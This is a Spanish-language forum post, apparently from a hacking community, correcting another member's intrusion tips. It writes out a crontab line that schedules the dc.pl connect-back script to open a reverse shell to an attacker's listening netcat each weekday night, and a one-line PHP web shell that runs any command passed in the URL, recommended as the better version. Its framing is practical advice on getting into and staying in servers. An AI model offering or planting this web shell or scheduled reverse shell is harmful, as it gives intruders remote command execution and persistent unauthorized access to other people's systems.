Bueno, no me gusta corregir mucho, pero es mejor alejar la ignorancia de nuestras casas.
Buenas, podrias entrar al ftp subir un backdoor como por ejemplo el dc.pl
No es un Backdoor, el dc.pl es simplemente un script en perl que sirve para hacer conexiones inversas, el termino backdoor vendria siendo mas bien un servicio oculto que permite el ingreso a cualquier hora y fecha a un sistema. Aunque el propio autor lo bautize con el nombre Data Cha0s Connect Back Backdoor, eso de backdoor no me parece muy apropiado.
Mas bien, si se utilizara el crontab para hacer correr este script, n minuto n hora n dia n mes con determinado argumento, depronto si se podria considerar como un backdoor.
crontab -e;
0 2 * * 1-5 /home/user/www/dc.pl ip puerto
Para ejecutar el script de lunes a viernes a las 2 de la mañana, eso si, a esa hora debemos estar con el netcat a la escucha en determinado puerto, sin contar que el sistema este protegido por un firewall.
<html>
<?php
system($cmd);
?>
</html>
En vez de ese ejemplo, utiliza:
<?php
system($_GET['cmd']);
?>
Ya que si el servidor tiene la directiva register_globals en off, $cmd no se tomaria por medio de un get/post/cookies
buffer overflow, stack overflow o head overflow
No es Head Overflow, es Heap Overflow:http://www.w00w00.org/files/articles/heaptut.txt
Se me escapo mas cosas pero vaa, me voy a dormir

Saludos !